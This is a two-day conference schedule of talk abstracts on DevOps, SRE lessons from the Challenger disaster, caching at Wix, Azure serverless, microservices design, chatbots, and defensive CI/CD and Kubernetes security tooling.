Workshop Stage 1
Tuesday, September 14, 2021
The Space Shuttle was the most advanced machine ever designed. It was a triumph and a marvel of the modern world.
And on January 1986, the shuttle Challenger disintegrated seconds after launch. This session will discuss how and why the disaster occurred and what lessons modern DevOps and Site Reliability Engineers should learn from it.
The Challenger disaster was not only a failure of the technology, but a failure of the engineering and management culture in NASA. While engineers were aware of problems in the technology stack, there was not enough awareness of the risks they actually posed to the spacecraft. Management had shifted the focus from “prove that it’s safe to launch” to “prove that it’s unsafe to stop the launch”.
This session will present the risk analysis (or lack thereof) of the Shuttle program and draw parallels to modern software development. In the end, launching a shuttle is an extremely complex deployment to the cloud… and above it.
Too often we encounter the idea that software architecture is an esoteric concept, of which only the chosen ones, and at the right time, are allowed to discuss. Well, how about a little change of perspective? With software development and users' needs evolving so fast, we don’t afford the luxury of rewriting systems from scratch just because teams fail to understand what they are building. Today’s software developers are tomorrow's architects. We must challenge them to step away from the IDE and understand how the architecture evolves in order to create a common and stable ground in terms of quality, performance, reliability, and scalability. At the same time, software architects need to step away from the abstractions and stay updated to the project development reality. This session revolves around finding the right ways of intertwining up-front architecture, API design & coding while maintaining a continuous focus on architecture evolution.
The Journey of achieving No-Ops (No-Operations) always begins with 2 key objectives
• Extreme automation
• No “dedicated” infrastructure teams, ever!
In this era of tech-evolution, even though we are already in the middle of Industry 4.0 revolution, there is no unified / singular framework to adopt No-Ops. Everyone has a different take of what No-Ops to them means. While for some the idea of evolving their systems to minimal operations is exciting, for a few – its more of a way to refine management of teams & channelize their efforts into something towards development. Whatever it may be, loosing operations specialists is still a long distant dream. Maybe we are so dependent on Managed-Ops, that plugging it off “majorly” is a nightmare to even think of.
The continuous growth of the CD tooling with a plethora of extensions made available to the DevOps ecosystem, even though we have significantly achieved & reaped quantifiable benefits from this implementation – scaling this across the organizational divisions is becoming a visible challenge.
Introducing more evolutionary controls such as templating provisioning & orchestration, immunizing integrations & connectors, adding extended & deep monitoring systems etc., Uncertainty & Unreliability still is a common problem across transformation scoring charts.
Revolutionary processes like Chaos Engineering, Auto-Enabled SRE, AIOps are creating aspirational backlogs for BU’s who are still struggling to manage their existing implementation
Operations (Ops) amalgamated with development transformational ways of using microservices, containerization etc. applications are becoming indeed complex to manage as well.
Current Ops management is already beyond the scope of manual management & it will eventually become worse in the years to come because of the growing complexity of applications.
It’s time to introduce a friend, DevOps & CD automation needed since a good long time. Welcome No-Ops!
Few key highlights of the talk would be:
1. In DevOps Ecosystem
a. With Speed & Agility comes Responsibility
b. The Human limitations aspect of evolution
2. DevOps + AIOps – How will the match be?
3. AIOps – Few Key Enablers
a. Market Analysis – what the future beholds
b. How to integrate with your current tools
a. The Entire Framework
b. How DevOps is to be extended, properly with AIOps
c. How it enables SRE Teams
d. Interesting Use Cases
5. The Road Ahead
Do you want to detect the license plate of a car? Or if people are wearing their masks? Nowadays, these are typical examples of object detection and image classification which are easy in theory, but what about the actual deployment? There are many options from the Edge to the Cloud how you could do that. Let me show you the simplest and do even a comparison when it comes to the platform question.
I will use Cloud-managed Cisco Meraki IP cameras together with SaaS computer vision platforms, for example from AWS, Azure and GCP, to showcase the simple deployment, possible integrations with APIs & MQTT and its whole architecture as well as actual outcomes.
Wix has a huge scale of traffic. more than 500 billion HTTP requests and more than 1.5 billion Kafka business events per day.
This talk goes through 4 Caching Patterns that are used by Wix's 1500 microservices in order to provide the best experience for Wix users along with saving costs and increasing availability.
A cache will reduce latency, by avoiding the need of a costly query to a DB, a HTTP request to a Wix servicer, or a 3rd-party service. It will reduce the needed scale to service these costly requests.
It will also improve reliability, by making sure some data can be returned even if aforementioned DB or 3rd-party service are currently unavailable.
The patterns include:
* Configuration Data Cache - persisted locally or to S3
* HTTP Reverse Proxy Caching - using Varnish Cache
* Kafka topic based 0-latency Cache - utilizing compact logs
* (Dynamo)DB+CDC based Cache and more - for unlimited capacity with continuously updating LRU cache on top
each pattern is optimal for other use cases, but all allow to reduce costs and gain performance and resilience.
Event-driven, real-time development in the cloud is a major part of many organizations’ digital transformation initiatives and businesses realize that data is the currency of competitive advantage. Event-driven applications must consume, enrich, and deliver data securely in real-time, and efficiently at scale. Therefore, the size of data packets, speed and frequency of data transmission and update, and the “intelligence” of data handling, are critical to successfully running mission-critical, corporate applications and making time-sensitive business decisions.
The core expertise of many companies lies in the development of their business applications, not in developing streaming data technology. As organizations everywhere move to the cloud, the demand for the dynamic enrichment, management and security of real-time, inflight data is critical. The fundamental challenge of developing event-driven, real-time applications and systems for the cloud, is managing the complexity of the end-to-end journey from sources to recipients of the highly “perishable” data – fast, reliably, securely, often in large volume, and sometimes to many recipients (hundreds of thousands of applications, systems, and devices concurrently). This talk will highlight how an Intelligent Event Data Platform enables organizations to accelerate innovation and deliver game-changing, real-time applications to market faster, while significantly reducing the cost of software development and operations.
In the Demo
* We will see how to develop Angular SPA and host it on Azure Static Web app and will use integrated API ( Azure Function ) to develop our translator modules , authentication .
* We will see how to use workflows using Azure Logic Apps to trigger invite mail once a user login to our application
* Finally we will also cover Serverless Cosmos DB which is used as our persistence layer.
We went from a single monolith to a set of microservices that are small, lightweight, and easy to implement. Microservices enable reusability, make it easier to change and scale apps on demand but they also introduce new problems. How do microservices interact with each other toward a common goal? How do you figure out what went wrong when a business process composed of several microservices fails? Should there be a central orchestrator controlling all interactions between services or should each service work independently, in a loosely coupled way, and only interact through shared events? In this talk, we’ll explore the Choreography vs Orchestration question and see demos of some of the tools that can help.
Azure Functions are the serverless offering from Microsoft on Azure, enabling the fulfillment of many use cases without the need to worry about the servers. By responding to events within the Azure platform, Functions are granted access to a wide variety of use cases and situations. Perhaps their most important role is as the "glue" for event driven architectures mainly through supported bindings.
In this talk, we will walk through the most commonly used bindings and illustrate ways larger systems can be constructed through the use of gluing Azure Service offerings together using functions.
Both Box and Split, like many other companies are working to split their monolith into microservices. We didn't want to just end up with a distributed monolith (i.e. lots of services that still had a very high level of interdependency), so this required some specific thinking. Additionally, we wanted to think about how to make sure we didn't have the overhead of hundreds of services while also not ending up with several mini-monoliths. In order to think about how to design our new services, we approached the problem using domain driven design and layered architecture.
DDD is an approach to developing software for complex needs by deeply connecting the implementation to an evolving model of the core business concepts. It's an approach that was first coined in 2004 but is still very applicable today. It emphasizes problem solving, cross functional collaboration and simplicity.
Meanwhile, layered architecture, while a fairly common approach, does not have the same common language or formalized concepts that domain driven design has. We used layered architecture as a way to think about how we separate our front end services, our core logic, and our infrastructure services.
Together, these two approaches helped us think through how and where to divide our services. In this talk, I will go into much more depth about what each of these two approaches are, as well as how we applied each to our problem space at Split.
Wednesday, September 15, 2021
As businesses continue to expose information through APIs, API programming has grown significantly and the number of API endpoints available has increased by leaps and bounds. An integration consuming a set of such APIs needs to adhere to the agreed SLAs with the customers. In the era of cloud integration platforms, making sure that your cloud-based integration is up to scratch in performance is not simple.
Integration-based development increases the risk of performance mistakes in the code compared to traditional programs that do not depend on external services. Since developers combine multiple services or APIs with unknown performance characteristics, these mistakes are usually missed out during development. With the help of artificial intelligence (AI), integrated development environments (IDE) can take up the burden of helping engineers to write performant code.
In this session, I will talk about how to use both AI and theoretical performance models to provide accurate performance forecasts for API integrations. I will demonstrate how this approach can be useful for inexperienced developers to write performant code.
Microsoft's CEO Satya Nadella has said: "Human Language is the new UI layer, bots are like new application". As more and more bots are getting popular in homes and enterprises, the demand for custom bots is increasing in rapid space. In the post-covid-19 pandemic world, we are seeing a high uptick in self-service chat-bots.
However, according to the latest study by Gartner, more than eighty percent of chat-bots projects failed in the year 2019.
In this session, we will cover how to successfully roll out chat-bots in the enterprise space.
We will talk about the factors that contribute to the failure of the chat-bots implementation, how we can learn from them and avoid them. Using the latest offerings in the Microsoft conversational AI space, how can we create enterprise-grade chat-bots.
You will learn:
Common factors that contribute to the failure of the chat-bot implementation
How to use the latest offering in Microsoft conversation AI space and create enterprise-grade chat-bots?
Best practices for Chat-Bots implementation
You can find talks demonstrating how some security tools work in isolation, but what about a closer to life scenario showing how to introduce security throughout development, deployment and runtime?
This is the demo that will finally fill that gap! Attendees will be able to take back knowledge and get a head start in introducing security everywhere in their SDLC.
We’ll see a hands on demonstration of how to use a variety of tools under the CNCF to dramatically enhance the security of any environment:
- In-Toto will help us ensure the integrity of our software from development to deployment
- Kyverno will allow us to define policies in our environment to guarantee compliance
- We’ll use Notary to sign our dockerimages and finally
- Falco we’ll notify us if any threats are identified in the runtime of our kubernetes cluster
Most CI/CD pipelines used by DevOps teams utilize integrations with services such as APIs, databases and other critical systems to complete their workflows. These integrations usually required the use of extremely sensitive secrets such as passwords, tokens or certificates and must be securely protected at all times. Unauthorized access of these pipeline secrets open these systems to threats from bad actors and illegal access of data.
In this talk Angel will discuss common pain points in properly securing applications, CI/CD pipelines and protecting sensitive access gates to integration targets. Attendees will learn strategies to secure their applications, sensitive data and pipeline integration points. Attendees will leave with a better understanding of how to implement security layers that can improve their pipeline security posture.